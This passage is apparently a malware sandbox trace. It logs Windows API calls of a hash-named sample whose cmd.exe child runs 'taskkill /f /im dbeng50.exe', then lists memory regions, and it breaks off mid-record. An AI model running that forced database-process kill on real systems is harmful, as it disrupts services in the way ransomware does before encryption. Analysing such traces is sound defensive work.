lpProcName="CopyFileExW") returned 0x7561ffc0 [0200.753] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0200.753] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0200.753] GetProcessHeap () returned 0x6a0000 [0200.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x400a) returned 0x6abd60 [0200.753] GetProcessHeap () returned 0x6a0000 [0200.754] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6abd60) returned 1 [0200.755] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0200.755] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0200.755] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0200.755] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0200.755] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0200.755] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0200.755] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0200.755] GetProcessHeap () returned 0x6a0000 [0200.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x58) returned 0x6aacb8 [0200.755] GetProcessHeap () returned 0x6a0000 [0200.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1a) returned 0x6a7278 [0200.756] GetProcessHeap () returned 0x6a0000 [0200.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x32) returned 0x6aad18 [0200.757] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0200.813] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0200.814] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0200.814] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0200.814] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0200.814] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0200.814] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0200.814] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0200.814] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0200.814] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0200.814] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0200.814] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0200.814] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0200.814] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0200.814] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0200.814] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0200.814] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0200.814] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0200.814] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0200.814] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0200.814] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0200.814] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0200.814] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0200.814] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0200.814] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0200.814] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0200.814] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0200.814] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0200.814] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0200.814] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0200.815] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0200.815] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0200.815] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0200.815] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0200.815] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0200.815] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0200.815] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0200.815] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0200.815] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0200.815] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0200.815] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0200.815] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0200.815] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0200.815] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0200.815] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0200.815] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0200.815] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0200.815] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0200.815] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0200.815] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0200.815] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0200.815] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0200.815] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0200.815] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0200.815] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0200.815] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0200.815] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0200.816] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0200.816] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0200.816] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0200.816] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0200.816] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0200.816] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0200.816] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0200.816] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0200.816] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0200.816] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0200.816] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0200.816] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0200.816] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0200.816] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0200.816] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0200.816] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0200.816] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0200.816] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0200.816] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0200.816] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0200.816] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0200.816] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0200.816] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0200.816] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0200.816] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0200.816] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0200.816] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0200.817] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0200.817] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0200.817] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0200.817] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0200.817] GetProcessHeap () returned 0x6a0000 [0200.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x210) returned 0x6aad58 [0200.817] GetProcessHeap () returned 0x6a0000 [0200.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x44) returned 0x6aaf70 [0200.817] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0200.817] GetProcessHeap () returned 0x6a0000 [0200.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x418) returned 0x6a05c8 [0200.818] SetErrorMode (uMode=0x0) returned 0x8003 [0200.818] SetErrorMode (uMode=0x1) returned 0x0 [0200.818] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6a05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0200.818] SetErrorMode (uMode=0x8003) returned 0x1 [0200.818] GetProcessHeap () returned 0x6a0000 [0200.818] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6a05c8, Size=0x56) returned 0x6a05c8 [0200.818] GetProcessHeap () returned 0x6a0000 [0200.818] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6a05c8) returned 0x56 [0200.818] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0200.818] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.818] GetProcessHeap () returned 0x6a0000 [0200.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x110) returned 0x6aafc0 [0200.818] GetProcessHeap () returned 0x6a0000 [0200.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x218) returned 0x6a0628 [0200.823] GetProcessHeap () returned 0x6a0000 [0200.823] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6a0628, Size=0x112) returned 0x6a0628 [0200.823] GetProcessHeap () returned 0x6a0000 [0200.823] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6a0628) returned 0x112 [0200.823] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0200.823] GetProcessHeap () returned 0x6a0000 [0200.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xe0) returned 0x6ab0d8 [0200.825] GetProcessHeap () returned 0x6a0000 [0200.825] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ab0d8, Size=0x76) returned 0x6ab0d8 [0200.825] GetProcessHeap () returned 0x6a0000 [0200.825] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6ab0d8) returned 0x76 [0200.825] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.825] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0200.825] GetLastError () returned 0x2 [0200.825] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x6ab158 [0200.826] GetProcessHeap () returned 0x6a0000 [0200.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6a76e0 [0200.826] FindClose (in: hFindFile=0x6ab158 | out: hFindFile=0x6ab158) returned 1 [0200.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0200.826] GetLastError () returned 0x2 [0200.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x6ab158 [0200.826] GetProcessHeap () returned 0x6a0000 [0200.826] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6a76e0, Size=0x4) returned 0x6a7e90 [0200.826] FindClose (in: hFindFile=0x6ab158 | out: hFindFile=0x6ab158) returned 1 [0200.827] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0200.827] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0200.827] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0200.830] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0200.830] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0200.830] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140)) [0200.830] GetProcessHeap () returned 0x6a0000 [0200.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x18) returned 0x6a78c0 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0200.830] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0200.831] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0200.831] GetProcessHeap () returned 0x6a0000 [0200.831] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6a78c0) returned 1 [0200.831] GetProcessHeap () returned 0x6a0000 [0200.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xa) returned 0x6a7ea0 [0200.832] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.835] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im dbeng50.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im dbeng50.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im dbeng50.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x1118, dwThreadId=0x57c)) returned 1 [0200.854] CloseHandle (hObject=0x98) returned 1 [0200.854] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0200.854] GetProcessHeap () returned 0x6a0000 [0200.854] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6a9e60) returned 1 [0200.854] GetEnvironmentStringsW () returned 0x6a9e60* [0200.855] GetProcessHeap () returned 0x6a0000 [0200.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xa76) returned 0x6a7fe8 [0200.855] FreeEnvironmentStringsA (penv="=") returned 1 [0200.855] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0202.253] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0202.253] CloseHandle (hObject=0x9c) returned 1 [0202.254] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0202.254] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0202.255] GetProcessHeap () returned 0x6a0000 [0202.256] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6a7fe8) returned 1 [0202.256] GetEnvironmentStringsW () returned 0x6ab2a0* [0202.256] GetProcessHeap () returned 0x6a0000 [0202.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xa9c) returned 0x6a7fe8 [0202.256] FreeEnvironmentStringsA (penv="=") returned 1 [0202.257] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.257] GetProcessHeap () returned 0x6a0000 [0202.257] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6a7fe8) returned 1 [0202.258] GetEnvironmentStringsW () returned 0x6ab2a0* [0202.258] GetProcessHeap () returned 0x6a0000 [0202.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xa9c) returned 0x6a7fe8 [0202.258] FreeEnvironmentStringsA (penv="=") returned 1 [0202.258] GetProcessHeap () returned 0x6a0000 [0202.258] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6a7ea0) returned 1 [0202.258] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0202.258] _get_osfhandle (_FileHandle=1) returned 0x13c [0202.258] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0202.258] _get_osfhandle (_FileHandle=1) returned 0x13c [0202.258] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0202.258] _get_osfhandle (_FileHandle=0) returned 0x130 [0202.258] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0202.258] GetConsoleOutputCP () returned 0x1b5 [0202.262] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0202.263] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.264] exit (_Code=128) Thread: id = 280 os_tid = 0xb9c Process: id = "53" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2f72a000" os_pid = "0x1118" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0x9b4" cmd_line = "taskkill /f /im dbeng50.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3907 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3908 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3909 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3910 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 3911 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3912 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 3913 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3914 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3915 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 3916 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3917 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3918 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3919 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3920 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3921 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3922 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3923 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3924 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3925 start_va = 0x4170000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 3926 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3927 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3928 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3929 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3930 start_va = 0x4400000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3931 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3932 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3933 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3934 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3935 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3936 start_va = 0x4580000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 3937 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 